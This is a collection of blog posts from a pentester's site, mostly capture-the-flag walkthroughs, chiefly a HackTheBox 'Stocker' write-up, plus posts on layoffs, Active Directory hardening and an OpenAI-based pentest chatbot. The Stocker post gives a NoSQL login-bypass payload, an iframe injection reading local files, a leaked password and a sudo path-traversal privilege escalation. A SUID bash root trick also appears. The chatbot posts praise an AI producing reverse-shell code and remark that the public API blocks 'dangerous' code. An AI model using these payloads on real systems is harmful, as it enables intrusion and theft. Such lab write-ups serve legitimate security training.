ls
container
flag4.txt
root@dogcat:~# cat flag4.txt
cat flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Conclusion

This was a pretty easy room. I did like that idea of the log poisoning. I don’t often see that on a simple LFI room, nice touch. It made me think 🙂 I thought it was going to be easier than that.

I was also happy it wasn’t a simple docker breakout. I had to search a bit to find that backup script running. A lot of times the standard binaries (Living off the Land) on the box can help you a lot without having to rely on the PEAS scripts etc.

I had a lot of fun doing this.

Initial Difficulty: 6/10
Overall Difficulty: 5/10
Fun Level: 8/10

HackTheBox – Stocker

HackTheBox

I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerated and found no robots.txt.
There is a 302 redirect on the standard port.

Added stocker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enumerate a little further and found, using BurpSuite, that the login was vulnerable to NoSQL injection.

BurpSuite Capture Login

Changing the content-type to json and putting a nosql bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the packet from BurpSuite, this gets us a login because the Express query evaluates to true, and we now see items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet pointing at /etc/passwd, it will give us a list of users.

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Adding the above captured _id to /api/po/ID on the site gives us the rendered iframe, which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.

Now we have a possible username of angoose. Remember we are looking for a non-system account, one with a shell such as /bin/bash. The others only show /bin/false or /usr/sbin/nologin, so those are unusable for our purpose.

Now we can use the same trick to grab the site's index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password, too: IHeardPassphrasesArePrettySecure, thanks to the coder hardcoding it into the script because they had not yet created any kind of dotenv environment or secrets database to store it in.

As an aside, a trick that coders will use is to obfuscate passwords to applications: take a password, base64 encode it and store that in a file. The application then reads it, runs a base64 -d operation on it to recover the true password and uses it from a variable in the script. This keeps the password out of the script itself. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files on the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by appending ../../../home/angoose/ to the path.

This points at the script in our home directory while still satisfying the requirement that the script be run from /usr/local/scripts, as that is where the path starts.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some initial challenges with not being able to load the site. After that I had some instability which forced me to request a restart of the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Big Tech Job Cuts – where to go now?

Google is one of the latest companies to cut tech jobs. Some 12,000 jobs this week.

With big tech reeling from some historic job losses, many tech workers may be wondering where they should go from here.

For myself, I’ve been studying for the last 10 months or so, Cybersecurity. Like many large enterprise organisations, I’ve seen a tremendous uptick in Security related incidents. At some point I decided to turn my attention on the subject.

As I would find out some 10 months later, it’s a very good thing I did. I was one of the many hundreds of thousands that have been affected by the recent layoffs from Big Tech globally.

I’ve been doing some studying recently to see what fields are popping for the mid-term and long-term future. Here are some interesting results.

  1. Data science and analysis: With the increasing amount of data being generated, there is a growing demand for professionals who can collect, analyze, and interpret data.
  2. Cybersecurity: As technology becomes more prevalent, the need for professionals who can protect against cyber threats also increases.
  3. Cloud computing: As more companies move their operations to the cloud, there is a growing need for professionals who can design, build, and maintain cloud-based systems.
  4. Artificial intelligence and machine learning: As these technologies continue to advance, there will be a growing demand for professionals who can develop and apply AI and ML solutions to various industries.
  5. Business development and consulting: With the changing business landscape, there is a need for professionals who can help companies navigate and adapt to new technologies and market trends.
  6. Project and product management: This role involves leading cross-functional teams to deliver a product or service.

While some of these jobs may be common-sense alternatives, some might be surprising. For example, project and product management. I think maybe for the short term this might be important, but long term I'm not so sure.

Some of the obvious ones are AI and Cybersecurity, however. I would also say that anything supporting cloud computing is quite important. This is because so many new tools need to be made in this area to handle integration with analytics, cybersecurity and more.

If you are one of the many tech workers who has lost their jobs, I feel your pain. I put this list together to share some hope for a bright new future though. Wishing you all the best of luck as we navigate these new and uncertain times ahead.

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, I named this project, as I mentioned, after the Isis character in the Star Trek episode Assignment: Earth. There was an AI that was able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I'd also add that some of the code such as the history and training questions can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like injections, snippets and code into either files or into my working flow. To be honest, when I started this project I was shocked that Isis actually generated some totally unique reverse shell code for me in PHP. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly I could not get the same result using the playground, as the public API seems to block 'dangerous' code. I'm not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the first of its kind. This was released and within weeks I saw other cool apps from others follow, like GitHub's Copilot, which to my mind is super cool and similar to how I envisioned Isis to begin with, except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis

Top 5 ways to protect your Active Directory from Hackers


Here are five ways to protect Active Directory from hackers:

  1. Use strong and unique passwords: It is important to use strong, unique passwords for all accounts in Active Directory, including administrator accounts. You should also enable password complexity and password expiration policies to help ensure that strong passwords are being used.
  2. Enable two-factor authentication: Two-factor authentication (2FA) requires users to provide an additional form of authentication, such as a security token or one-time code, in addition to their password. This helps to protect against password-based attacks and can significantly increase the security of your Active Directory environment.
  3. Use Group Policy Objects (GPOs) to implement security policies: GPOs can be used to enforce security policies across your Active Directory environment, such as setting password complexity requirements, disabling insecure protocols, and restricting access to certain resources.
  4. Regularly update and patch your systems: It is important to keep all systems, including your Active Directory infrastructure, up to date with the latest patches and security updates. This helps to protect against known vulnerabilities that could be exploited by hackers.
  5. Monitor and audit your Active Directory environment: Regularly monitoring and auditing your Active Directory environment can help you identify potential security issues and take appropriate action to address them. You should also consider implementing a security incident and event management (SIEM) solution to help you monitor and analyze security events in real-time.

More CTF fun with Overpass 2 – Hacked

I did a new and interesting kind of room over at Tryhackme called Overpass 2. This is a remake of the original Overpass room. Lots more CTF fun with Overpass 2 – Hacked!

Quick Review

This room involved being on a Blue team, and working from a packet capture to figure out what clues might have been left as to why/who/what/where this may have happened. Then you are to take that information, and use it to break back into the system and take back control of your long lost (and very sad) flags. 😉

I use Wireshark a lot at work, being in networking. I haven't seen such blatantly left breadcrumbs in all my years, but it was a lot of fun doing this room.

It didn't take long to gather all of the initial answers for the first few Tasks in this room.

I found it interesting to download the backdoor that they used, and analyse it to figure out how it worked. The backdoor was used to maintain persistence by setting up another ssh server on a separate port.

Where I did have some trouble was with technical issues with hashcat. It kept refusing to run on my VM due to how I am set up, with no PCI passthrough for my graphics card. It seems like it wants to only use the GPU, even though there are flags there for using the CPU.

At any rate, I found a work around and was able to start the crack. I had forgotten that it was salted however, and had to do it again after figuring out the correct syntax.

The last Task of getting back in was quite easy. I just SSH'd back in through the attackers' backdoor using their own credentials that I had cracked, then I immediately found a SUID copy of bash sitting (hidden) in their home as .suid_bash.

I just ran ./.suid_bash -p to get root and the last flag.

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root

Spoilers/Walkthrough

If you want the spoilers and need help with the room you can read my complete walkthrough here: https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Overpass%202%20-%20Hacked.md

Like what I do? https://www.buymeacoffee.com/c0ri

Capture The Flag – Daily Bugle


Pretty tough room today playing Capture the Flag – Daily Bugle over on Tryhackme. The room had a fun Spiderman Theme.

This room was rated HARD, but TBH I didn’t think it was that bad. I would consider it an Intermediate room. There were a few things that made it harder than usual however, so I’ll try to go over that a bit.

There were almost no notes to work from, it was more or less ‘Here is the server, hack it’. This made it quite a bit more challenging.

Another issue was scanning with SQLMap didn’t reveal anything with a normal scan, but there was a cryptic note about SQLi vulnerabilities so what else can you do but press on.

Finding the version of Joomla, the sites’ CMS, was extremely helpful because we could find a great Python scripted exploit to get in.

The rest was pretty much downhill until the very end. The exploit for yum required an RPM, but there’s no fpm for Kali.. that’s more for Redhat RPMs. But, I did find a way to do it using a ruby gem called fpm.

Bookmark this and install it, because you will need it one day I promise: https://fpm.readthedocs.io/en/v1.10.2/source/gem.html

For that matter, I suggest you install Golang and Ruby if you haven't already. Those are both extremely good and useful languages. If Gandhi was a programming language he would have been Ruby 😛

Anyway that was a little caveat that I’m sure has caught a few people out. You can check out my full notes for this room over on my github here:

https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Daily%20Bugle.md

Have some thoughts on this room? I’d love to hear your story!

Like what I do? https://www.buymeacoffee.com/c0ri

Capture the Flag – Skynet


A little more #CTF fun today on #Tryhackme as Capture the Flag – Skynet revealed some surprise.

I spent a little time today with a CTF on Tryhackme. Today's room was titled "Skynet". I kinda like the way they title and story these rooms. Hackers are so creative 😉

I think this room was pretty easy, but I did see some interesting developments near the end, where I found what appeared to be remnants of other people's code runs trying to get root using the same technique for 'tar' that I was using. I wonder if anyone else has seen this, or was this just extra trouble thrown in to see how we cope. I think if I had little or no experience with Linux it would have proved a very difficult challenge.

Anyway I try to include my thought process in the notes so you can see how I try to work around caveats.

Feel free to check out my walkthrough and let me know your experience with it.

https://github.com/c0ri/PentestingDocs/blob/main/CTFs/THM/Skynet.md

While you are at it, check out my latest project for Isis. An AI powered Hacking helper.

Isis – AI chatbot to help you with Penetration Testing

I have been super busy lately. Doing graduate studies, and also working hard every day training for my OSCP exam. I have been very productive tho!

I made some new code for penetration testers that will be a helper to find code inserts, shells, SQL injection and the like for you. AFAIK it's the first of its kind and it uses some pretty decent AI from OpenAI.

I like to think of ‘her’ as an angel on my shoulder. Imagine you are under a tight deadline. A company gave you only 5 days to test their websites and report your findings. Then imagine talking to Isis while you work and having her pop up suggestions for reverse-shell code, SQL injection etc. WOOOOOoo!

My initial work is promising, but there are still some kinks to work out. If you wanna contribute to the code that'd be cool too.

If you are interested in the code you can check it out here: https://github.com/c0ri/isis

Love what I do? https://www.buymeacoffee.com/c0ri